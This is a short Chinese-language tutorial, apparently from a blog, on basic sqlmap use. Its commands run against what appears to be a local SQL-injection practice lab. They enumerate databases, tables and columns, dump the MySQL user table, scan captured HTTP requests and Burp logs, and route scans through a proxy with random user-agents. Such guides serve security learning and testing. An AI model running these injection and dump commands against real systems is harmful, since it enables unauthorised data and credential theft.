简单使用"/>
sqlMap的简单使用
文章目录
- 0 参数
- 一、单个、多个 url 查询
- 2 自动爆 数据库名称+表名+列名
- 2.1 自动爆 一个数据库下面的表-列名 -D
- 2.2 报一个表的字段
- 二 ,http 头部文件 扫描
- 三 ,http bp日志扫描
- 3. 指定 http 里面 的 User-Agent
- 4.基于代理去跑 安全
提示:
0 参数
--batch # 默认
--dbs #爆出数据库
--tables #爆出 全部表
--columns # 爆出 全部 列的名字
--hostname # 目标主机名字
--passwords # mysql密码
-u 单个查询 格式: 字符串 “url?id=1”-m 多个查询 格式: txt “url?id=1” “url?id=1”“url?id=1”-r http 头部查询 格式: txt 记得用 【--level 5 】 (cookie,nc什么什么的)
一、单个、多个 url 查询
1.单个 -u
sqlmap -u "192.168.0.63/sqli/fei1/?id=1"
1.多个 -m
sqlmap -m feixiang.txt
feixiang.txt:
192.168.0.63/sqli/fei1/?id=1
192.168.0.63/sqli/fei2/?id=1
192.168.0.63/sqli/fei3/?id=1
2 自动爆 数据库名称+表名+列名
- 数据库名称: --dbs
- 表名 : --tables
- 列名: --columns
2.1 自动爆 一个数据库下面的表-列名 -D
sqlmap -u 'url?id=1' --dbs --tables --columns --dump --batch
2.2 报一个表的字段
sqlmap -u "http://192.168.0.66/?id=1" --batch -D mysql -T user -C "User" --dump --threads 10
二 ,http 头部文件 扫描
sqlmap -r http.txt --batch
http.txt:
GET /sqli/Less-20/index.php HTTP/1.1Host: 192.168.0.63
User-Agent: Mozilla/5.0 (X11; Linux x86_64; rv:91.0) Gecko/20100101 Firefox/91.0
Accept: text/html,application/xhtml+xml,application/xml;q=0.9,image/webp,*/*;q=0.8
Accept-Language: en-US,en;q=0.5
Accept-Encoding: gzip, deflate
Referer: http://192.168.0.63/sqli/Less-20/
Connection: close
Cookie: uname=admin
Upgrade-Insecure-Requests: 1
Cache-Control: max-age=0
三 ,http bp日志扫描
-
使用bp抓包 保持访问过的 http头部文件
sqlmap -l bp.txt --batch --dbs --level 5
-l :log http log 的意思
–level 5 : cookie 等http头部文件查询
3. 指定 http 里面 的 User-Agent
3.1 手动
sqlmap -u "url?id=1" --user-agent="龙老板" --batch
3.1 自动
sqlmap -u "url?id=1" --random-agent --batch
4.基于代理去跑 安全
sqlmap -u "url?id=1" --proxy "http://192.168.0.111:10800(外网连接)" --delay="1" --random-agent --batch
–delay # 1毫秒
更多推荐
sqlMap的简单使用
发布评论